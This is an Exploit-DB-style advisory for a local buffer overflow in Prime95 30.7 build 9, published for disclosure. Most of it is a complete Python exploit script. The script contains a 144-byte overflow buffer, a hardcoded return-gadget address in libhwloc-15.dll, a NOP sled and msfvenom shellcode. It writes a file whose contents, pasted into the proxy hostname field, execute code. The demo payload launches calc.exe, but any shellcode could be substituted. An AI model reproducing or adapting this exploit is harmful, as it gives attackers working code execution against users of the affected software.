Prime95 Version 30.7 build 9 - Remote Code Execution (RCE)

vendor:

Prime95

by:

Yehia Elghaly

7.5

CVSS

HIGH

Buffer Overflow (RCE) Local

Buffer Overflow

CWE

Product Name: Prime95

Affected Version From: 30.7 build 9

Affected Version To: 30.7 build 9

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested: Windows 7 Professional x86

2022

Prime95 Version 30.7 build 9 – Remote Code Execution (RCE)

Prime95 Version 30.7 build 9 Buffer Overflow RCE. The exploit allows an attacker to execute remote code.

Mitigation:

Apply the latest patch or upgrade to a non-vulnerable version of the software.

Source

Exploit-DB raw data:

# Exploit Title: Prime95 Version 30.7 build 9 - Remote Code Execution (RCE)
# Discovered by: Yehia Elghaly
# Discovered Date: 2022-04-25
# Vendor Homepage: https://www.mersenne.org/
# Software Link : https://www.mersenne.org/ftp_root/gimps/p95v307b9.win32.zip
# Tested Version: 30.7 build 9
# Vulnerability Type:  Buffer Overflow (RCE) Local
# Tested on OS: Windows 7 Professional x86

# Description: Prime95 Version 30.7 build 9 Buffer Overflow RCE

# 1- How to use: open the program go to test-PrimeNet-check the square-Connections 
# 2- paste the contents of open.txt in the optional proxy hostname field and the calculator will open

buffer = "A" * 144
jum = "\xd8\x29\xe7\x6e" #push esp # ret  |  {PAGE_EXECUTE_READ} [libhwloc-15.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\ex\libhwloc-15.dll)
nop = "\x90" * 20 #Nob 
hot = "C" * 100

#sudo msfvenom -p windows/exec CMD=calc.exe -b "\x00\x09\x0A\x0d" -f python -v payload
payload =  b""
payload += b"\xbb\x72\xd7\x5d\x16\xdb\xc0\xd9\x74\x24\xf4\x5d"
payload += b"\x29\xc9\xb1\x31\x83\xc5\x04\x31\x5d\x0f\x03\x5d"
payload += b"\x7d\x35\xa8\xea\x69\x3b\x53\x13\x69\x5c\xdd\xf6"
payload += b"\x58\x5c\xb9\x73\xca\x6c\xc9\xd6\xe6\x07\x9f\xc2"
payload += b"\x7d\x65\x08\xe4\x36\xc0\x6e\xcb\xc7\x79\x52\x4a"
payload += b"\x4b\x80\x87\xac\x72\x4b\xda\xad\xb3\xb6\x17\xff"
payload += b"\x6c\xbc\x8a\x10\x19\x88\x16\x9a\x51\x1c\x1f\x7f"
payload += b"\x21\x1f\x0e\x2e\x3a\x46\x90\xd0\xef\xf2\x99\xca"
payload += b"\xec\x3f\x53\x60\xc6\xb4\x62\xa0\x17\x34\xc8\x8d"
payload += b"\x98\xc7\x10\xc9\x1e\x38\x67\x23\x5d\xc5\x70\xf0"
payload += b"\x1c\x11\xf4\xe3\x86\xd2\xae\xcf\x37\x36\x28\x9b"
payload += b"\x3b\xf3\x3e\xc3\x5f\x02\x92\x7f\x5b\x8f\x15\x50"
payload += b"\xea\xcb\x31\x74\xb7\x88\x58\x2d\x1d\x7e\x64\x2d"
payload += b"\xfe\xdf\xc0\x25\x12\x0b\x79\x64\x78\xca\x0f\x12"
payload += b"\xce\xcc\x0f\x1d\x7e\xa5\x3e\x96\x11\xb2\xbe\x7d"
payload += b"\x56\x4c\xf5\xdc\xfe\xc5\x50\xb5\x43\x88\x62\x63"
payload += b"\x87\xb5\xe0\x86\x77\x42\xf8\xe2\x72\x0e\xbe\x1f"
payload += b"\x0e\x1f\x2b\x20\xbd\x20\x7e\x43\x20\xb3\xe2\xaa"
payload += b"\xc7\x33\x80\xb2"

evil = buffer + jum + nop + payload

file = open('PExploit.txt','w+')
file.write(evil)
file.close()